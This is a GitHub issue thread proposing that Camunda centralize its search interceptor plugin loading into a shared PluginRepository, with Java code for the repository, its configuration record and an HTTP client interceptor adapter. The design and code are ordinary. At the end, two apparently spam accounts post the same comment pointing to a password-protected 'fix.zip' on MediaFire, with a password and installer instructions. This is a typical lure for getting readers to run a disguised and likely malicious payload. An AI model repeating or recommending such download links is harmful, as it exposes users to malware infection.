### ISSUE TITLE
Centralize implementation of search plugin loading

### ISSUE THREAD

**Issue by npepinpe** [camunda/camunda#21562]
**Description**

To simplify maintenance and reduce risks of bugs, we will replace the current interceptor plugin loading code (which is sextuplicated) and centralize it in a new `io.camunda.search.connect.plugin` package in the `camunda-search-connect` module.

This will then be called by the Operate ES/OS connectors, the Tasklist ES/OS connectors, and the Zeebe ES/OS exporters. The idea is that eventually it will _only_ be called by the shared common connector code (i.e. what's in the `camunda-search-connect` module), and indirectly used in the applications above.

The following is a proposal of what it could look like, feel free to challenge it.

I would propose following the `*Repository` pattern, as we did with the gateway interceptors/filters, and the Zeebe exporters. This is because in most cases, the plugins only need to be loaded once, and should live for the complete application lifetime. Only in the case of exporters are they loaded on a per-exporter basis (note: this further highlights the exporter pattern is not the right one for our search storage, but that's out of scope here).

So, for example, you would have the following repository:

<details><summary>PluginRepository.java</summary>

```java
/** Loads and holds references to the configured plugins. */
public final class PluginRepository implements AutoCloseable {
  private static final Logger LOGGER = LoggerFactory.getLogger(PluginRepository.class);

  private final ExternalJarRepository jarRepository;
  private final SequencedMap<String, Class<? extends DatabaseCustomHeaderSupplier>> plugins;
  private final Path basePath;

  public PluginRepository() {
    this(
        new LinkedHashMap<>(),
        new ExternalJarRepository(),
        Paths.get(Optional.ofNullable(System.getProperty("basedir")).orElse(".")));
  }

  PluginRepository(
      final SequencedMap<String, Class<? extends DatabaseCustomHeaderSupplier>> plugins,
      final ExternalJarRepository jarRepository,
      final Path basePath) {
    this.plugins = plugins;
    this.jarRepository = jarRepository;
    this.basePath = basePath;
  }

  public SequencedMap<String, Class<? extends DatabaseCustomHeaderSupplier>> getPlugins() {
    return Collections.unmodifiableSequencedMap(plugins);
  }

  public boolean isEmpty() {
    return plugins.isEmpty();
  }

  public CompatHttpRequestInterceptor asRequestInterceptor() {
    return PluginRepositoryInterceptor.ofRepository(this);
  }

  public PluginRepository load(final SequencedCollection<PluginConfiguration> configs) {
    if (configs == null || configs.isEmpty()) {
      return this;
    }

    configs.forEach(
        config -> {
          try {
            load(config);
          } catch (final Exception e) {
            LOGGER.debug("Failed to load interceptor {} with config {}", config.id(), config);
            LangUtil.rethrowUnchecked(e);
          }
        });

    return this;
  }

  @Override
  public void close() throws Exception {
    try {
      jarRepository.close();
    } catch (final Exception e) {
      LOGGER.warn(
          "Failed to close external JAR repository; may result in dangling file descriptors", e);
    }
  }

  Stream<DatabaseCustomHeaderSupplier> instantiate() {
    return plugins.entrySet().stream().map(entry -> instantiate(entry.getKey(), entry.getValue()));
  }

  private void load(final PluginConfiguration config) throws ExternalJarLoadException {
    final ClassLoader classLoader;
    final Class<? extends DatabaseCustomHeaderSupplier> interceptorClass;
    final String id = config.id();

    if (plugins.containsKey(id)) {
      return;
    }

    if (!config.isExternal()) {
      classLoader = getClass().getClassLoader();
    } else {
      final var jarPath = basePath.resolve(config.jarPath());
      // the class loader will be closed along with the JAR repository
      classLoader = jarRepository.load(jarPath);
    }

    try {
      final Class<?> specifiedClass = classLoader.loadClass(config.className());
      interceptorClass = specifiedClass.asSubclass(DatabaseCustomHeaderSupplier.class);
    } catch (final ClassNotFoundException e) {
      throw new PluginLoadException(id, "cannot load specified class", e);
    } catch (final ClassCastException e) {
      throw new PluginLoadException(
          id,
          "specified class does not implement " + DatabaseCustomHeaderSupplier.class.getName(),
          e);
    }

    plugins.put(id, interceptorClass);
  }

  private DatabaseCustomHeaderSupplier instantiate(
      final String id, final Class<? extends DatabaseCustomHeaderSupplier> interceptorClass) {
    try {
      return instrumented(ReflectUtil.newInstance(interceptorClass));
    } catch (final Exception e) {
      throw new PluginLoadException(id, "cannot instantiate via the default constructor", e);
    }
  }

  private DatabaseCustomHeaderSupplier instrumented(final DatabaseCustomHeaderSupplier supplier) {
    return () ->
        ThreadContextUtil.supplyWithClassLoader(
            supplier::getCustomHttpHeader, supplier.getClass().getClassLoader());
  }
}
```

</details>

And the paired configuration record:

<details><summary>PluginConfiguration.java</summary>

```java
public record PluginConfiguration(String id, String className, Path jarPath) {
  boolean isExternal() {
    return jarPath != null;
  }
}
```

</details>

> Note that here we follow the pattern of interceptors/exporters, allowing us to load external/internal plugins. This greatly simplifies testing and development for very little overhead.

Finally, this is paired with a small request interceptor adapter - this is because we still support Apache HTTP Client 4 and Apache HTTP Client 5, which use different APIs. So we can provide a wrapper which performs the abstraction for us. This can be simplified once we only support the newer client versions which use only Apache HTTP Client 5.

<details><summary>CompatHttpRequestInterceptor</summary>

```java
/** TODO: remove and simplify once no connector is using Apache HTTP Client 4.x */
public interface CompatHttpRequestInterceptor
    extends HttpRequestInterceptor, org.apache.http.HttpRequestInterceptor {}
```

</details>

<details><summary>PluginRepositoryInterceptor.java</summary>

```java
final class PluginRepositoryInterceptor implements CompatHttpRequestInterceptor {
  private final SequencedCollection<DatabaseCustomHeaderSupplier> plugins;

  PluginRepositoryInterceptor(final SequencedCollection<DatabaseCustomHeaderSupplier> plugins) {
    this.plugins = plugins;
  }

  static PluginRepositoryInterceptor ofRepository(final PluginRepository repository) {
    final var interceptors = repository.instantiate().toList();
    return new PluginRepositoryInterceptor(interceptors);
  }

  @Override
  public void process(
      final HttpRequest request, final EntityDetails entity, final HttpContext context) {
    for (final var plugin : plugins) {
      setHeader(plugin, request::setHeader);
    }
  }

  @Override
  public void process(
      final org.apache.http.HttpRequest request,
      final org.apache.http.protocol.HttpContext context) {
    for (final var plugin : plugins) {
      setHeader(plugin, request::setHeader);
    }
  }

  private void setHeader(
      final DatabaseCustomHeaderSupplier plugin, final HeaderConsumer headerConsumer) {
    final var header = plugin.getCustomHttpHeader();
    headerConsumer.accept(header.key(), header.value());
  }

  private interface HeaderConsumer {
    void accept(final String key, String value);
  }
}
```

</details>

> [!Note]
> Since you always want to load the plugins, you could consider forcing the plugin configs to be injected into the constructor of the repository, and not loaded later on, and make the whole thing immutable.

The API is that you create it via `new PluginRepository().load(SequencedCollection<PluginConfiguration>)`. Why a sequenced collection? Because as with the interceptors, it may be useful in some cases to guarantee the ordering the plugins, so that you can control in which order they modify the request. If we use a plain `Map`, this is not possible, since the ordering is non deterministic.

So how would the usage of this look like? You create a plugin repository in a central place where you need it, and where you will manage its lifecycle. For example, as a Spring Bean (per client configuration), since Spring will close it based on the object graph dependency. Or in an exporter, where it's created in the configure method, and closed in the close method.

Once the plugins are loaded, you would call `PluginRepository#asRequestInterceptor` and add this to any HTTP client (regardless of version) as an interceptor. It will take care of calling the plugin properly, with the right class loader, and in the order the plugins were defined.

Doing this means you can easily unit test the repository by itself - test all edge cases and so on - and not have to test that much all these external JARs, class loading exceptions, etc., in the other applications where the code is called.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
